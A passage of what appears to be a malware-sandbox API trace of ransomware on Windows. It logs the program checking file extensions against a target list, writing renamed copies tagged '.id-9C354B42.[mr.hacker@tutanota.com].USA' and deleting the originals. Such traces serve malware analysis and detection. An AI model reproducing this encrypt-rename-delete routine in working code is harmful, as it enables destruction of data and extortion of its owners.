Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.059] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81 [0050.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81 [0050.059] lstrlenW (lpString=".doc") returned 4 [0050.059] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.059] lstrlenW (lpString=".docx") returned 5 [0050.059] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0050.060] lstrlenW (lpString=".pdf") returned 4 [0050.060] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.060] lstrlenW (lpString=".xls") returned 4 [0050.060] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.060] lstrlenW (lpString=".xlsx") returned 5 [0050.060] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0050.060] lstrlenW (lpString=".ppt") returned 4 [0050.060] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.060] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81 [0050.060] lstrlenW (lpString=".zip") returned 4 [0050.060] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.060] lstrlenW (lpString=".rar") returned 4 [0050.060] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.060] lstrlenW (lpString=".bz2") returned 4 [0050.060] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.060] lstrlenW (lpString=".7z") returned 3 [0050.060] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.060] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 81 [0050.060] lstrlenW (lpString=".dbf") returned 4 [0050.060] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0052.262] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=205220) returned 1 [0052.262] CloseHandle (hObject=0x1f4) returned 1 [0052.263] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv")) returned 0x20 [0052.263] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.263] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.263] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0052.263] lstrcmpiW (lpString1=".docx", lpString2="n.wmv") returned -1 [0052.263] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0052.263] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0052.263] lstrcmpiW (lpString1=".xlsx", lpString2="n.wmv") returned -1 [0052.263] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0052.263] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0052.263] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0052.263] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0052.263] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".docx", lpString2="n.wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0052.264] lstrcmpiW (lpString1=".xlsx", lpString2="n.wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0052.264] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0052.264] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0052.265] lstrcmpiW (lpString1=".xsl", lpString2=".USA") returned 1 [0052.447] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=28974) returned 1 [0052.447] CloseHandle (hObject=0x1b4) returned 1 [0052.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 0x20 [0052.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0052.447] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.447] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.448] GetLastError () returned 0x0 [0052.448] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x712e, lpOverlapped=0x0) returned 1 [0052.452] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x7130, lpOverlapped=0x0) returned 1 [0052.453] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.453] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.453] SetEndOfFile (hFile=0x220) returned 1 [0052.454] CloseHandle (hObject=0x220) returned 1 [0052.454] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.454] SetEndOfFile (hFile=0x1b4) returned 1 [0052.455] CloseHandle (hObject=0x1b4) returned 1 [0052.455] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.455] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 1 [0052.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0052.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0052.456] lstrlenW (lpString=".doc") returned 4 [0052.456] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.456] lstrlenW (lpString=".docx") returned 5 [0052.456] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1 [0052.456] lstrlenW (lpString=".pdf") returned 4 [0052.456] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.456] lstrlenW (lpString=".xls") returned 4 [0052.456] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.456] lstrlenW (lpString=".xlsx") returned 5 [0052.456] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1 [0052.456] lstrlenW (lpString=".ppt") returned 4 [0052.456] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0052.456] lstrlenW (lpString=".zip") returned 4 [0052.456] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.456] lstrlenW (lpString=".rar") returned 4 [0052.456] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.456] lstrlenW (lpString=".bz2") returned 4 [0052.456] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.456] lstrlenW (lpString=".7z") returned 3 [0052.456] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0052.456] lstrlenW (lpString=".dbf") returned 4 [0052.456] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0052.457] lstrlenW (lpString=".1cd") returned 4 [0052.457] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0052.457] lstrlenW (lpString=".jpg") returned 4 [0052.457] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.457] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=34076) returned 1 [0052.458] CloseHandle (hObject=0x1b4) returned 1 [0052.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 0x20 [0052.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0052.458] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.458] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.458] GetLastError () returned 0x0 [0052.458] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x851c, lpOverlapped=0x0) returned 1 [0052.460] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x8520, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x8520, lpOverlapped=0x0) returned 1 [0052.461] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.461] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0052.461] SetEndOfFile (hFile=0x220) returned 1 [0052.462] CloseHandle (hObject=0x220) returned 1 [0052.462] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.462] SetEndOfFile (hFile=0x1b4) returned 1 [0052.463] CloseHandle (hObject=0x1b4) returned 1 [0052.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.463] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 1 [0052.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.464] lstrlenW (lpString=".doc") returned 4 [0052.464] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString=".docx") returned 5 [0052.464] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.464] lstrlenW (lpString=".pdf") returned 4 [0052.464] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString=".xls") returned 4 [0052.464] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString=".xlsx") returned 5 [0052.464] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.464] lstrlenW (lpString=".ppt") returned 4 [0052.464] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.464] lstrlenW (lpString=".zip") returned 4 [0052.464] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.464] lstrlenW (lpString=".rar") returned 4 [0052.464] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString=".bz2") returned 4 [0052.464] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString=".7z") returned 3 [0052.464] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.464] lstrlenW (lpString=".dbf") returned 4 [0052.464] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.464] lstrlenW (lpString=".1cd") returned 4 [0052.464] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0052.464] lstrlenW (lpString=".jpg") returned 4 [0052.464] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.465] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=32146) returned 1 [0052.465] CloseHandle (hObject=0x1b4) returned 1 [0052.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 0x20 [0052.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0052.465] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.466] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.466] GetLastError () returned 0x0 [0052.466] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x7d92, lpOverlapped=0x0) returned 1 [0052.468] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x7da0, lpOverlapped=0x0) returned 1 [0052.469] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.469] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.470] SetEndOfFile (hFile=0x220) returned 1 [0052.470] CloseHandle (hObject=0x220) returned 1 [0052.470] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.470] SetEndOfFile (hFile=0x1b4) returned 1 [0052.471] CloseHandle (hObject=0x1b4) returned 1 [0052.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.471] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl")) returned 1 [0052.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.471] lstrlenW (lpString=".doc") returned 4 [0052.471] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.471] lstrlenW (lpString=".docx") returned 5 [0052.471] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.471] lstrlenW (lpString=".pdf") returned 4 [0052.471] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.471] lstrlenW (lpString=".xls") returned 4 [0052.472] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.472] lstrlenW (lpString=".xlsx") returned 5 [0052.472] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.472] lstrlenW (lpString=".ppt") returned 4 [0052.472] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.472] lstrlenW (lpString=".zip") returned 4 [0052.472] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.472] lstrlenW (lpString=".rar") returned 4 [0052.472] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.472] lstrlenW (lpString=".bz2") returned 4 [0052.472] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.472] lstrlenW (lpString=".7z") returned 3 [0052.472] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.472] lstrlenW (lpString=".dbf") returned 4 [0052.472] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.472] lstrlenW (lpString=".1cd") returned 4 [0052.472] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 77 [0052.472] lstrlenW (lpString=".jpg") returned 4 [0052.472] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.472] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=39515) returned 1 [0052.472] CloseHandle (hObject=0x1b4) returned 1 [0052.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl")) returned 0x20 [0052.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0052.473] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.473] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.473] GetLastError () returned 0x0 [0052.473] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x9a5b, lpOverlapped=0x0) returned 1 [0052.475] WriteFile (in: hFile=0x220, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x9a60, lpOverlapped=0x0) returned 1 [0052.476] ReadFile (in: hFile=0x1b4, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.477] WriteFile (in: 